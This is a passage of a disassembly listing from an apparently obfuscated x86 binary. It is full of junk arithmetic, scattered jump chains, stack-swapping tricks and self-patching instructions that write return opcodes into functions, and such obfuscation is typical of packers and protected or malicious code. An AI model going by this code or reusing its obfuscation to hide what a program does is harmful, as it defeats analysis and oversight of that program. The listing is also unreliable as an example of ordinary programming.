sub_451222	proc near		; DATA XREF: sub_45AA0B:loc_449A64o

; FUNCTION CHUNK AT 0043C533 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441DAF SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044AE5D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451AB6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004571AD SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045AFB9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045BDD9 SIZE 0000000B BYTES

		or	eax, eax
		jnz	loc_45AFB9
		jmp	loc_45BDD9
sub_451222	endp

; ---------------------------------------------------------------------------
		jmp	loc_45B534
; ---------------------------------------------------------------------------

loc_451234:				; CODE XREF: k2vbe3.d:00454D35j
		jnz	loc_44BD5E
		call	sub_43C04E
		test	al, al
		jmp	loc_45273C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_451246:				; CODE XREF: sub_444B3E+3D48j
		and	eax, 50D0C9Eh
		sub	eax, 46827ECBh
		or	eax, 3F952BCFh
		add	eax, 48428036h
		add	eax, ebp
		jmp	loc_459C28
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

locret_451265:				; CODE XREF: k2vbe3.d:0045379Cj
		retn
; ---------------------------------------------------------------------------

loc_451266:				; CODE XREF: k2vbe3.d:0044EE11j
		jmp	loc_459A6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4517D6

loc_45126B:				; CODE XREF: sub_4517D6-14FF7j
		jmp	loc_43F86A
; END OF FUNCTION CHUNK	FOR sub_4517D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_451270:				; CODE XREF: sub_44A6BD:loc_440B1Fj
		xchg	ecx, [esp+4+var_4]
		push	ecx
		pop	edx
		pop	ecx
		mov	eax, [esp+0]
		push	edx
		jmp	loc_43D5D6
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B208

loc_45127F:				; CODE XREF: sub_44B208+34C7j
		sub	ebx, ecx
		jmp	loc_440E58
; END OF FUNCTION CHUNK	FOR sub_44B208
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_451286:				; CODE XREF: sub_452092-2273j
		cdq
; END OF FUNCTION CHUNK	FOR sub_452092

; =============== S U B	R O U T	I N E =======================================



sub_451287	proc near		; CODE XREF: k2vbe3.d:0043C391p
		xchg	eax, [esp+0]
		pop	eax
		test	al, al
		jz	loc_458FFC
		jmp	loc_44B865
sub_451287	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_451298:				; CODE XREF: k2vbe3.d:0045BD82j
		push	0E1249A98h
		mov	edx, 5250297h
		push	6E58566Ah

loc_4512A7:				; CODE XREF: k2vbe3.d:loc_45BD71j
		xor	ebx, ds:4000E8h
		add	ebx, 9744C905h
		jmp	loc_441718
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_144. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4512B9	proc near		; CODE XREF: k2vbe3.d:loc_4538FBp
					; sub_454AD4:loc_45AECFj

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004464CD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A724 SIZE 00000005 BYTES

		push	eax
		call	sub_449FE9
		push	edi
		mov	edi, eax
		xchg	edi, [esp+4+var_4]
		jmp	loc_44A724
sub_4512B9	endp

; ---------------------------------------------------------------------------

loc_4512CA:				; CODE XREF: k2vbe3.d:0045B579j
		pop	eax
		xchg	esi, [ebx]
		sub	eax, 85E17ADFh
		jmp	loc_43C1EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448113

loc_4512D8:				; CODE XREF: sub_448113+6270j
		xor	edx, esi
		rol	edx, 5
		add	edx, edi
		rol	edx, 5
		xor	edx, ebp
		rol	edx, 5
		jmp	loc_456305
; END OF FUNCTION CHUNK	FOR sub_448113
; ---------------------------------------------------------------------------

loc_4512EC:				; CODE XREF: k2vbe3.d:0044C06Dj
		cmp	edi, 70BF9C72h
		jmp	loc_44DA48
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4512F7:				; CODE XREF: sub_45A323-1D6FFj
		adc	esi, eax
		or	edi, 0DBC628B0h
		xor	ebx, esi
		jnb	loc_441AD9
		jmp	loc_444279
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_45130C:				; DATA XREF: sub_44A1B1-CECo
		cmp	dword ptr [ebp-0Ch], 5
		jnz	loc_45131D
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 8
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_45131D:				; CODE XREF: sub_451E00-E6A3j
					; sub_44D316-9BB0j ...
		jns	loc_445E69
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F6h
		jz	loc_458DF8
		jmp	loc_445E54
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454639

loc_451338:				; CODE XREF: sub_454639:loc_449CDEj
		jp	loc_4520C3
		jmp	loc_44E54D
; END OF FUNCTION CHUNK	FOR sub_454639
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447266

loc_451343:				; CODE XREF: sub_447266+136BDj
		jge	loc_44947A
		cmp	edx, ebp
		jmp	loc_43FCF6
; END OF FUNCTION CHUNK	FOR sub_447266
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_451350:				; CODE XREF: sub_44D0D5-5849j
		jnz	loc_45AB5B

loc_451356:				; CODE XREF: sub_457024+Aj
		jmp	loc_441BD9
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_45135B:				; CODE XREF: k2vbe3.d:00445EC2j
		jmp	loc_45A94B
; ---------------------------------------------------------------------------
		and	edx, 0B96B4FECh
		jmp	loc_45AB4D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_222. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_45136C:				; CODE XREF: sub_43F7AC+17129j
		jmp	loc_4519C9
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E9

loc_451371:				; CODE XREF: sub_4448E9-38FFj
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_4448E9
; ---------------------------------------------------------------------------
		ror	ebp, 7
		cmp	esi, 7BC55723h
		jmp	loc_4552B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456208

loc_451384:				; CODE XREF: sub_456208:loc_440810j
		push	offset loc_4486C9
		jmp	loc_44D3CD
; END OF FUNCTION CHUNK	FOR sub_456208
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A21D

loc_45138E:				; CODE XREF: sub_45A21D:loc_459603j
		sub	ecx, 0F5FD125Bh
		add	ecx, 6CEC14F3h
		xor	ecx, 0CB64DBDCh
		add	edx, ecx
		jmp	loc_45A5BC
; END OF FUNCTION CHUNK	FOR sub_45A21D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_4513A7:				; CODE XREF: sub_444B3E:loc_4426B6j
		jge	loc_446BC6
; END OF FUNCTION CHUNK	FOR sub_444B3E
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_4513AD:				; CODE XREF: sub_43DFE1+29EBj
		jmp	loc_43C3D5
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
		test	edi, ecx
		jmp	loc_446BBA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_4513B9:				; CODE XREF: sub_4553CC:loc_43D9D5j
		jz	loc_44BE3E
		jmp	loc_449087
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4402FA

loc_4513C4:				; CODE XREF: sub_4402FA+1634Bj
		jz	loc_44A89F
		jmp	loc_447423
; END OF FUNCTION CHUNK	FOR sub_4402FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4513CF:				; CODE XREF: sub_44C90E:loc_441CADj
		xor	ecx, 5ED23840h
		adc	edx, esi
		pop	esi
		shr	eax, 12h
		jmp	loc_4529B6
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_4513E0:				; CODE XREF: k2vbe3.d:00459FB3j
		jnp	loc_43EDBE
		sub	ebx, ecx
		jnz	loc_440A35
		jmp	loc_44C3C1
; ---------------------------------------------------------------------------
		mov	eax, 1171F650h
		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp]
		jmp	loc_45848C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_451403:				; CODE XREF: sub_43FF59:loc_44362Dj
					; sub_43FF59+36E6j
		add	esi, 2A0EA642h
		xchg	esi, [esp+0]
		jmp	sub_443A95
; END OF FUNCTION CHUNK	FOR sub_43FF59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_451411:				; CODE XREF: sub_44B979-35CAj
					; sub_44B979:loc_452BAEj
		call	sub_453FF1
		test	al, al
		jz	loc_44C423
		jmp	loc_43FA68
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------

loc_451423:				; CODE XREF: k2vbe3.d:0045956Aj
		jnz	loc_44288D
		jmp	loc_441072
; ---------------------------------------------------------------------------

loc_45142E:				; DATA XREF: k2vbe3.d:0044A29Bo
		call	sub_4436CE
		push	182D52C1h
		pop	edx
		sub	edx, 0E36217C8h
		rol	edx, 1
		test	edx, 4000000h
		jmp	loc_44A49B
; ---------------------------------------------------------------------------

locret_45144C:				; CODE XREF: k2vbe3.d:0044CA27j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E753

loc_45144D:				; CODE XREF: sub_43E753:loc_45600Ej
		xchg	ecx, [esp+0]
		jmp	loc_43EEC1
; END OF FUNCTION CHUNK	FOR sub_43E753
; ---------------------------------------------------------------------------
		mov	ds:off_41E1B0, eax
		lea	eax, sub_449774
		mov	byte ptr [eax],	0C3h
		jmp	sub_449774
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_451469:				; CODE XREF: sub_450F71:loc_443D97j
		cdq
		or	ebp, 0B1245970h
		push	630DD949h
		and	edi, edx
		jmp	loc_453689
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_45147C:				; CODE XREF: sub_44B870+90C7j
		jl	loc_4579A4
		not	edi

loc_451484:				; CODE XREF: sub_44B870:loc_446D6Ej
		push	0FA043CE6h
		pop	eax
		add	eax, 0F12620B8h
		jmp	loc_442120
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------

loc_451495:				; CODE XREF: k2vbe3.d:loc_4477E4j
		pop	ebx
		sub	ecx, 0C76BC5Ch
		and	ecx, ds:4000EEh
		add	ecx, 0F6BDE143h
		jmp	loc_454330
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6B7

loc_4514AD:				; CODE XREF: sub_44D6B7:loc_444897j
		call	sub_455762

loc_4514B2:				; CODE XREF: sub_44B495+5CD4j
		jmp	nullsub_217
; END OF FUNCTION CHUNK	FOR sub_44D6B7

; =============== S U B	R O U T	I N E =======================================



sub_4514B7	proc near		; CODE XREF: sub_449372:loc_44F7E2j
		push	ebx

loc_4514B8:				; CODE XREF: sub_456541:loc_459CEEj
		call	sub_443F0D
sub_4514B7	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44EEFE

loc_4514BD:				; CODE XREF: sub_44EEFE:loc_44EA8Aj
		sub	ecx, 4B84FC1Eh
		rol	ecx, 1Ah
		xor	ecx, 5DFDB2B6h
		add	ecx, 7456119h
		jmp	loc_44B71A
; END OF FUNCTION CHUNK	FOR sub_44EEFE
; ---------------------------------------------------------------------------

locret_4514D7:				; CODE XREF: k2vbe3.d:0045A874j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_4514D8:				; CODE XREF: sub_44E481:loc_45022Aj
		jmp	nullsub_111
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_4514DD:				; CODE XREF: sub_452092-540Cj
		jmp	sub_44ADEC
; END OF FUNCTION CHUNK	FOR sub_452092

; =============== S U B	R O U T	I N E =======================================



sub_4514E2	proc near		; CODE XREF: k2vbe3.d:00447E68j
					; sub_442DF0+D5CBp

; FUNCTION CHUNK AT 00441831 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DF64 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004568A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457C65 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	ds:dword_441228, eax
		jmp	loc_44DF64
sub_4514E2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_4514F0:				; CODE XREF: sub_442DF0:loc_44E5B0j
		cmp	ds:dword_441228, 0
		jnz	loc_440599
		jmp	loc_44789B
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A69B

loc_451502:				; CODE XREF: sub_45A69B+Fj
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_431
; END OF FUNCTION CHUNK	FOR sub_45A69B
; ---------------------------------------------------------------------------
		push	ebx
		push	0D46A645Bh
		pop	ebx
		and	ebx, 691B860Ch
		add	ebx, 0C9B1DA7Fh
		test	ebx, 2
		jmp	loc_45BD71
; ---------------------------------------------------------------------------

loc_451528:				; CODE XREF: k2vbe3.d:00454FEFj
		or	eax, 46D79B72h
		ja	loc_44520D

loc_451534:				; CODE XREF: k2vbe3.d:loc_454FE3j
		rol	eax, 1Bh
		add	eax, 803027BEh
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_444BDB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_451546:				; CODE XREF: sub_454E69-CCD5j
		adc	eax, 0B78944E7h
		jp	loc_4520B5
		adc	esi, 5E2CD220h
		sbb	ebx, esi
		jmp	loc_442491
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------

loc_45155F:				; DATA XREF: sub_4589FD-2A39o
		xchg	edx, [esp]
		jmp	loc_446CB5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_208. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_451568:				; CODE XREF: sub_4597AE-16363j
		jmp	loc_45022F
; END OF FUNCTION CHUNK	FOR sub_4597AE

; =============== S U B	R O U T	I N E =======================================



sub_45156D	proc near		; CODE XREF: sub_43C067+3FACp
					; k2vbe3.d:0045200Dj

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00443ECC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449BD9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EAF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EFA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045195B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00452A31 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00453C1A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045803B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459688 SIZE 00000010 BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		add	ecx, 2267DD0Eh
		xchg	ecx, [esp-8+arg_4]
		jmp	loc_44EFA3
sub_45156D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45157F:				; CODE XREF: k2vbe3.d:0044D85Ej
		jb	loc_4561C5
		mov	esi, [ebx]
		jmp	loc_458E63
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_457C8A
		jmp	loc_440DD2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_213. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_45159A:				; CODE XREF: sub_454234:loc_43F7C7j
					; sub_442DF0+899Fj
		rol	eax, 11h
		push	eax
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------

loc_4515A4:				; CODE XREF: k2vbe3.d:00456FC6j
		jmp	loc_44941A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_4515A9:				; CODE XREF: sub_4447EC+Ej
		jmp	loc_458B2A
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB1

loc_4515AE:				; CODE XREF: sub_43EBB1+Aj
		jmp	nullsub_112
; END OF FUNCTION CHUNK	FOR sub_43EBB1
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_4515B4:				; CODE XREF: k2vbe3.d:0044B2A2j
		jmp	loc_44E721
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459DA3

loc_4515B9:				; CODE XREF: sub_459DA3-57BFj
		mov	esi, ebp
		sbb	edx, eax
		or	ebp, 8AE0B26Eh

loc_4515C3:				; CODE XREF: sub_459DA3:loc_441616j
		push	offset sub_43DD3A
		jmp	nullsub_345
; END OF FUNCTION CHUNK	FOR sub_459DA3
; ---------------------------------------------------------------------------

loc_4515CD:				; CODE XREF: k2vbe3.d:004466DFj
		pushf
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_4515CE:				; CODE XREF: sub_44E90D-8240j
		sub	eax, 0D14548AFh
		test	eax, 20000000h
		jmp	loc_454214
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
		ror	eax, 9
		jmp	sub_457D2E

; =============== S U B	R O U T	I N E =======================================



sub_4515E7	proc near		; CODE XREF: k2vbe3.d:0044063Aj
					; sub_44067C+E7ACj ...

; FUNCTION CHUNK AT 0044DAD4 SIZE 0000001A BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebx
		call	sub_44EB59

loc_4515F1:				; CODE XREF: sub_449774-BBBBj
		jmp	loc_44DAD4
sub_4515E7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_4515F6:				; CODE XREF: sub_44B999-7EB3j
		jl	loc_444C45
		sub	eax, 6427B31Ah
		cdq
		xor	eax, ecx
		jmp	loc_444C44
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_45160A:				; CODE XREF: sub_44C90E-892Dj
		jnz	loc_454D1E
		jmp	loc_454648
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445541

loc_451615:				; CODE XREF: sub_445541:loc_44554Cj
		jge	loc_43D535
		test	eax, ecx
		jmp	loc_43D1EE
; END OF FUNCTION CHUNK	FOR sub_445541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_451622:				; CODE XREF: sub_44CA34:loc_4570DDj
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_454975
		jmp	loc_45BA3A
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454BF9

loc_451631:				; CODE XREF: sub_454BF9-10886j
		push	0D489127h
		pop	eax
		sub	eax, 3EA6DBDBh
		call	sub_44B58F
; END OF FUNCTION CHUNK	FOR sub_454BF9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_50. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_451643:				; CODE XREF: sub_45000F+9E7Cj
		jmp	loc_45341A
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451214

loc_451648:				; CODE XREF: sub_451214+9j
		jmp	loc_43DE01
; END OF FUNCTION CHUNK	FOR sub_451214
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446964

loc_45164D:				; CODE XREF: sub_446964-3F8Ej
		jmp	loc_44C1F2
; END OF FUNCTION CHUNK	FOR sub_446964
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_402. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_451653:				; CODE XREF: sub_4426DF+69Bj
		jmp	loc_458EEA
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_451658:				; CODE XREF: sub_44B94B-92E5j
		jmp	loc_43E4F6
; END OF FUNCTION CHUNK	FOR sub_44B94B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_446. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_45165E:				; CODE XREF: sub_44D298+5638j
		jmp	loc_4522B5
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DA2

loc_451663:				; CODE XREF: sub_449DA2:loc_440186j
					; k2vbe3.d:004401A4j
		sub	ebx, ds:4000E8h
		add	ebx, 0F4EDB635h
		rol	ebx, 9
		xor	ebx, 1FE09369h
		popf
		call	sub_45929A

loc_45167E:				; CODE XREF: k2vbe3.d:00453BABj
		jmp	loc_459B1F
; END OF FUNCTION CHUNK	FOR sub_449DA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_451683:				; CODE XREF: sub_445124:loc_440E9Dj
		jg	loc_458975
		jmp	loc_456B51
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_45168E:				; CODE XREF: sub_45000F-4AA7j
		or	eax, 0CCD6DF4Fh
		xor	eax, 3369F6CFh
		call	sub_4553CC
		push	esi
		push	903EEF36h
		pop	esi
		jmp	loc_454A02
; END OF FUNCTION CHUNK	FOR sub_45000F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_4516AB:				; CODE XREF: sub_455C7A:loc_450B26j
		add	edi, 0AC32B076h
		jmp	loc_459737
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_4516B6:				; CODE XREF: sub_44945C+11F3Ej
		rol	ecx, 0Bh
		push	ebx
		ja	loc_43D672

loc_4516C0:				; CODE XREF: k2vbe3.d:loc_446136j
		push	eax
		lea	eax, loc_4473A0
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+0]
		jmp	loc_43FE68
; END OF FUNCTION CHUNK	FOR sub_44945C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_4516D2:				; CODE XREF: sub_443EF6:loc_444FBEj
		cmp	esi, 0C79B9455h
		jmp	loc_454A1A
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------

locret_4516DD:				; CODE XREF: k2vbe3.d:loc_44CFF3j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_4516DE:				; CODE XREF: sub_43FF59+17j
		rol	eax, 12h
		xor	eax, 89C84D0h
		popf
		xchg	eax, [esp+0]
		pushf
		push	2BA2E656h
		pop	eax
		jmp	loc_43EB8E
; END OF FUNCTION CHUNK	FOR sub_43FF59
; ---------------------------------------------------------------------------

loc_4516F7:				; DATA XREF: sub_44D0D5:loc_448D65o
		lea	eax, [ebp-2BBh]
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44DE55
		jmp	loc_445E82
; ---------------------------------------------------------------------------
		add	eax, 6411D659h
		jmp	sub_455B0F

; =============== S U B	R O U T	I N E =======================================



sub_451719	proc near		; CODE XREF: k2vbe3.d:00449C5Fp
					; k2vbe3.d:0044BC65j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CA05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457DAB SIZE 00000008 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	[ecx], edx
		xchg	ebx, [esp-4+arg_0]
		mov	ecx, ebx
		jmp	loc_43CA05
sub_451719	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_315. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459AEA

loc_45172A:				; CODE XREF: sub_459AEA+Bj
		jmp	loc_453EC0
; END OF FUNCTION CHUNK	FOR sub_459AEA
; ---------------------------------------------------------------------------
		db 6Fh
dword_451730	dd 0			; DATA XREF: sub_43C82E:loc_442484r
					; sub_459371-4B55w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4511F7

loc_451734:				; CODE XREF: sub_4511F7+1D35j
		jmp	nullsub_135
; END OF FUNCTION CHUNK	FOR sub_4511F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447383

loc_451739:				; CODE XREF: sub_447383+9j
		jmp	loc_447552
; END OF FUNCTION CHUNK	FOR sub_447383
; ---------------------------------------------------------------------------

loc_45173E:				; CODE XREF: k2vbe3.d:004403F4j
		jmp	locret_4414FB
; ---------------------------------------------------------------------------

loc_451743:				; DATA XREF: sub_4443DD+6o
					; sub_43C82E+AE9Ao
		lds	ebp, [edx+33942AA9h]
		xor	ch, [esi]
		and	eax, esi
		mov	cl, 0
; START	OF FUNCTION CHUNK FOR sub_4545C4

loc_45174F:				; CODE XREF: sub_4545C4+Fj
		jmp	loc_447240
; END OF FUNCTION CHUNK	FOR sub_4545C4
; ---------------------------------------------------------------------------

loc_451754:				; CODE XREF: k2vbe3.d:0044F369j
		jmp	loc_444CF5

; =============== S U B	R O U T	I N E =======================================



sub_451759	proc near		; CODE XREF: sub_446258:loc_43CA6Fj
					; sub_44EC4A:loc_43CE4Ej ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EA38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004409EA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004417F5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00448F00 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044B0B3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044B9B7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044D254 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459C7E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00459FC7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A167 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C1C4 SIZE 00000005 BYTES

		jb	loc_44B9B7
		push	63ADA56Fh
		pop	edx
		jmp	loc_45C1C4
sub_451759	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443DD

loc_45176A:				; CODE XREF: sub_4443DD+14E99j
		jl	loc_44C7C5
; END OF FUNCTION CHUNK	FOR sub_4443DD
; START	OF FUNCTION CHUNK FOR sub_444E9E

loc_451770:				; CODE XREF: sub_444E9E+3j
		jmp	nullsub_116
; END OF FUNCTION CHUNK	FOR sub_444E9E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDC1

loc_451775:				; CODE XREF: sub_43FDC1+3AB4j
		jmp	nullsub_114
; END OF FUNCTION CHUNK	FOR sub_43FDC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F73B

loc_45177A:				; CODE XREF: sub_43F73B+10j
		jmp	loc_4581C0
; END OF FUNCTION CHUNK	FOR sub_43F73B
; ---------------------------------------------------------------------------
		jg	loc_44BB9A
		jmp	loc_44DDD9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_113. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3C0

loc_45178B:				; CODE XREF: sub_44B3C0+3E96j
		jmp	loc_44438C
; END OF FUNCTION CHUNK	FOR sub_44B3C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_451790:				; CODE XREF: sub_454E69-1169Bj
		jmp	loc_4494DE
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------

loc_451795:				; CODE XREF: k2vbe3.d:0043F921j
		jmp	nullsub_498
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D6A

loc_45179A:				; CODE XREF: sub_440D6A-D65j
		rol	ecx, 14h
